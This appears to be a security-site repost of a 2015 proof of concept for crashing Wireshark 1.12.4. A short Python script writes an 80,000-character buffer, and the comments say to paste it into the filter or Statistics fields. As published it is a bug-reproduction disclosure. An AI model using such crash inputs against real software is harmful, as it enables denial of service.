首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Wireshark 1.12.4 - Memory Corruption and Access Violation PoC
来源:acid.exploit@gmail.com 作者:Acid 发布时间:2015-05-04  
#!/usr/bin/python
# EXPLOIT TITLE: WIRESHARK <=1.12.4 Access Violation and Memory Corruption PoC
# AUTHOR: Avinash Kumar Thapa "-Acid"
# Date of Testing: 26th April'2015
# Vendor Homepage: http://www.wireshark.org
# Tested On : Windows 8.1 Pro
# Steps to Reproduce the Crash
# Step 1: Create a File Using PoC
# Step 2: Go to wirehshark and in filter field, put ip.addr=={Buffer}
# Step 3: Click "Apply"
# Some other places for the Crash are:
# Statistics > IP Statistics then any of the field you can use.
# Statistics > Packet Length > Paste the buffer in the field
# Statistics > ANCP
# Statistics > Collectd
# Statistics > Compared
# Statistis  > 
   
   
buffer = "A"*80000
   
file = open("wireshark.txt","w")
file.write(buffer)
file.close()
   
print "POC Created by -Acid"
print " Email: acid.exploit@gmail.com"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·iTunes 10.6.1.7 - '.PLS' Title
·Adobe Flash Player UncompressV
·Ninja Privilege Escalation Det
·RM Downloader 2.7.5.400 - Loca
·i.FTP 2.21 SEH Overflow Crash
·Novell ZENworks Configuration
·VideoSpirit Pro 1.91 Buffer Ov
·ElasticSearch Directory Traver
·Encaps PHP/Flash Gallery 2.3.2
·WordPress 4.2.1 XSS / Code Exe
·Legend Perl IRC Bot Remote Cod
·Mediacoder 0.8.34.5716 Buffer
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved